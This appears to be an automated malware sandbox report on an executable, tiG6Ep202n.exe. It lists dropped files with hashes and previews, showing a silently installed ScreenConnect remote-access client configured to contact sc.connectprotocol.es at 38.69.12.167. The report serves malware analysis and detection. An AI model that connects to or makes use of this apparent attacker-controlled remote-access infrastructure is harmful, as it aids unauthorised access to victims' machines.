                                                                                                            MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                                                            SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                                                            SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                                                            SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                                                            Malicious:false
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                            Process:C:\Users\user\Desktop\tiG6Ep202n.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):321
                                                                                                            Entropy (8bit):5.36509199858051
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                                                            MD5:1CF2352B684EF57925D98E766BA897F2
                                                                                                            SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                                                            SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                                                            SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                                                            Malicious:true
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1088392
                                                                                                            Entropy (8bit):7.789940577622617
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:QUUGGHn+rUGemcPe9MpKL4Plb2sZWV+tLv0QYu5OPthT+gd:jGHpRPqMpvlqs0O4iO2k
                                                                                                            MD5:8A8767F589EA2F2C7496B63D8CCC2552
                                                                                                            SHA1:CC5DE8DD18E7117D8F2520A51EDB1D165CAE64B0
                                                                                                            SHA-256:0918D8AB2237368A5CEC8CE99261FB07A1A1BEEDA20464C0F91AF0FE3349636B
                                                                                                            SHA-512:518231213CA955ACDF37B4501FDE9C5B15806D4FC166950EB8706E8D3943947CF85324FAEE806D7DF828485597ECEFFCFA05CA1A5D8AB1BD51ED12DF963A1FE4
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):234
                                                                                                            Entropy (8bit):4.977464602412109
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                                                                            MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                                                            SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                                                            SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                                                            SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                                                            Malicious:false
                                                                                                            Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):4.62694170304723
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                                                            MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                                                            SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                                                            SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                                                            SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):36864
                                                                                                            Entropy (8bit):4.340550904466943
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                                                            MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                                                            SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                                                            SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                                                            SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):57344
                                                                                                            Entropy (8bit):4.657268358041957
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                                                            MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                                                            SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                                                            SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                                                            SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):176128
                                                                                                            Entropy (8bit):5.775360792482692
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                                                            MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                                                            SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                                                            SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                                                            SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):548864
                                                                                                            Entropy (8bit):6.034211651049746
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                                                            MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                                                            SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                                                            SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                                                            SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):11776
                                                                                                            Entropy (8bit):5.273875899788767
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:V8/Qp6lCJuV3jHXtyVNamVNG1YZfCrMmbfHJ7kjvLjbuLd9NEFbM64:y/cBJaLXt2NaheUrMmb/FkjvLjbuZj64
                                                                                                            MD5:73A24164D8408254B77F3A2C57A22AB4
                                                                                                            SHA1:EA0215721F66A93D67019D11C4E588A547CC2AD6
                                                                                                            SHA-256:D727A640723D192AA3ECE213A173381682041CB28D8BD71781524DBAE3DDBF62
                                                                                                            SHA-512:650D4320D9246AAECD596AC8B540BF7612EC7A8F60ECAA6E9C27B547B751386222AB926D0C915698D0BB20556475DA507895981C072852804F0B42FDDA02B844
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1721856
                                                                                                            Entropy (8bit):6.639085961200334
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                                            MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                                            SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                                            SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                                            SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Users\user\Desktop\tiG6Ep202n.exe
                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8241152
                                                                                                            Entropy (8bit):7.950608858875448
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:98304:YwJ4t1h0cG5FGJRPxow8O5wJ4t1h0cG5hwJ4t1h0cG5UwJ4t1h0cG5:BWh0cGw8Wh0cGkWh0cGzWh0cG
                                                                                                            MD5:51DEB91FCA18628A252D5AB03AB83E7E
                                                                                                            SHA1:B75C70DD39437244FA4BF041D86ABB7F1DEB1363
                                                                                                            SHA-256:2002891CC778EE75D0F6EEA844EB45199F867B82BE7D69EA9625FC9FDC3F6E36
                                                                                                            SHA-512:0F6DBBFAF93E516DB970A9A4DF1F36BA564761AE0BB714FEA1B8735628A4DF566E14A5CE98F1A073B5BB84B04C747A4946FF7E3E5B48E94A1CBCC02A34E96987
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8241152
                                                                                                            Entropy (8bit):7.950608858875448
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:98304:YwJ4t1h0cG5FGJRPxow8O5wJ4t1h0cG5hwJ4t1h0cG5UwJ4t1h0cG5:BWh0cGw8Wh0cGkWh0cGzWh0cG
                                                                                                            MD5:51DEB91FCA18628A252D5AB03AB83E7E
                                                                                                            SHA1:B75C70DD39437244FA4BF041D86ABB7F1DEB1363
                                                                                                            SHA-256:2002891CC778EE75D0F6EEA844EB45199F867B82BE7D69EA9625FC9FDC3F6E36
                                                                                                            SHA-512:0F6DBBFAF93E516DB970A9A4DF1F36BA564761AE0BB714FEA1B8735628A4DF566E14A5CE98F1A073B5BB84B04C747A4946FF7E3E5B48E94A1CBCC02A34E96987
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8241152
                                                                                                            Entropy (8bit):7.950608858875448
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:98304:YwJ4t1h0cG5FGJRPxow8O5wJ4t1h0cG5hwJ4t1h0cG5UwJ4t1h0cG5:BWh0cGw8Wh0cGkWh0cGzWh0cG
                                                                                                            MD5:51DEB91FCA18628A252D5AB03AB83E7E
                                                                                                            SHA1:B75C70DD39437244FA4BF041D86ABB7F1DEB1363
                                                                                                            SHA-256:2002891CC778EE75D0F6EEA844EB45199F867B82BE7D69EA9625FC9FDC3F6E36
                                                                                                            SHA-512:0F6DBBFAF93E516DB970A9A4DF1F36BA564761AE0BB714FEA1B8735628A4DF566E14A5CE98F1A073B5BB84B04C747A4946FF7E3E5B48E94A1CBCC02A34E96987
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):423504
                                                                                                            Entropy (8bit):6.57768068531417
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:VuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvv:VuH2anwohwQUv5uH2anwohwQUvv
                                                                                                            MD5:DC3E09FD229DD1B8F03341A8E592493F
                                                                                                            SHA1:74FE7D90F3A7A26B14A317F3FCC50E9F400F6479
                                                                                                            SHA-256:59FA28BD313C8E7E307A0AE05CA89764EABFBC5183B401CEE6F0127566C13C65
                                                                                                            SHA-512:611A67C211FBF718C05E7F7CB026900D9E7CFF609410502ED9DBA429602819C8E9D5202A768E1010F72599324563297B3B07C8107593AEEAF79F12ADA2B4C3CC
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI9C5F.tmp, Author: Joe Security
                                                                                                            Preview:...@IXOS.@.....@.R.Y.@.....@.....@.....@.....@.....@......&.{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}'.ScreenConnect Client (a532d472f1ff1d4e)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (a532d472f1ff1d4e)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{CF9AE42D-A542-A5BE-DF54-2B1FF488B5E3}^.C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{9509AE8A-E997-4132-8CAB-BAFE89DF77F6}f.C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{8B377FBF-DB9A-CC34-86C5-7376F38045E2}c.C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileMa
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):207360
                                                                                                            Entropy (8bit):6.573348437503042
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                                            MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                                            SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                                            SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                                            SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):207360
                                                                                                            Entropy (8bit):6.573348437503042
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                                            MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                                            SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                                            SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                                            SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):1.1722278675808895
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:JSbX72Fj+AGiLIlHVRpIh/7777777777777777777777777vDHFUfK2Yw7rl0i8Q:JsQI5wGK2YbF
                                                                                                            MD5:BB8B7321B1787458E306724216A29918
                                                                                                            SHA1:FFBF328FD36CC446D91CBFF8316CB0F31DBDA963
                                                                                                            SHA-256:EEC4E0520B3FA370106F2811A16247D6572E632BE7F9F3C285802ACEF0B369A2
                                                                                                            SHA-512:1E8BE15DFE2A174B66288AFA780BE26CA85B8A453432B1613EDB86BCC0635823309BDB3416FC979C6B5E191EEBA6ACC675248388781938919E0CB94099CC4D15
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):1.8084437388556067
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:v8Ph2uRc06WXzEFT5VIYIR7imqcq56AduHvlSi3zSd/2cPWGn3f9aud+GZPFCrmh:uh215FTC7izp4fed/4G3f9FD9lqK
                                                                                                            MD5:AF358D9BEEC9195C8DC9FED4D4FC0DAD
                                                                                                            SHA1:1EB96EE0409EC416F97F0ECF9CB3643CFAEE0A5B
                                                                                                            SHA-256:83B419F9CE6C3E7A454AF12CCB13F1D688045F53777FD5A4A901169720F467BA
                                                                                                            SHA-512:46D4807809AC467ED9B5EC83B13F51E1820FD317AF1225D4DFFDA4662F57C74563BCA8CCB75F3AF34F32B2E4AFDF5ADD4888A269C359D680C3D84C17EF3634CD
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                                                                            Category:dropped
                                                                                                            Size (bytes):435
                                                                                                            Entropy (8bit):5.289734780210945
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
                                                                                                            MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                                                                            SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                                                                            SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                                                                            SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):360001
                                                                                                            Entropy (8bit):5.362976345308274
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaue:zTtbmkExhMJCIpEr
                                                                                                            MD5:56DD985EF0355D90CC1E5DA0E3E870AF
                                                                                                            SHA1:D156C943F14E48956C7625ACE3AEB95D1BA637E2
                                                                                                            SHA-256:E185853CED5B5E3D889CF878A32F5DE265A4735C61402CC1EB385410DF1CD7E3
                                                                                                            SHA-512:554F8783BD33F0F13DA36AA17814885AB152DD41EE990A705799427524E6A0A972EA391CAFA88D365DCA97F6F305E15CE324D53252E874398717E2A92C36377D
                                                                                                            Malicious:false
                                                                                                            Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):55
                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                            Malicious:false
                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                            Process:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):565
                                                                                                            Entropy (8bit):5.014055475464337
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOmMx0dhEitmQv/vXbAa3xT:2dL9hK6E46YPEJn3vH
                                                                                                            MD5:25CCE00363E65228151D958324BA586B
                                                                                                            SHA1:967E11FBE9EEB946E9B6F02BC6D8E815080E4739
                                                                                                            SHA-256:2E5DDB674273A2446E4B8D20B67702B72D50CBE961A27E56C110124C35990628
                                                                                                            SHA-512:DE97ED7F0917674EFB8ED521E7488EB3FACA5289E4865F8CDDFC2ABFE10FEF01231D60871AE5100D1BE638DD272FA459CF429261E55A49432211408CF8FEDCEC
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>sc.connectprotocol.es=38.69.12.167-03%2f12%2f2024%2015%3a20%3a15</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                            Process:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):565
                                                                                                            Entropy (8bit):5.014055475464337
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOmMx0dhEitmQv/vXbAa3xT:2dL9hK6E46YPEJn3vH
                                                                                                            MD5:25CCE00363E65228151D958324BA586B
                                                                                                            SHA1:967E11FBE9EEB946E9B6F02BC6D8E815080E4739
                                                                                                            SHA-256:2E5DDB674273A2446E4B8D20B67702B72D50CBE961A27E56C110124C35990628
                                                                                                            SHA-512:DE97ED7F0917674EFB8ED521E7488EB3FACA5289E4865F8CDDFC2ABFE10FEF01231D60871AE5100D1BE638DD272FA459CF429261E55A49432211408CF8FEDCEC
                                                                                                            Malicious:false
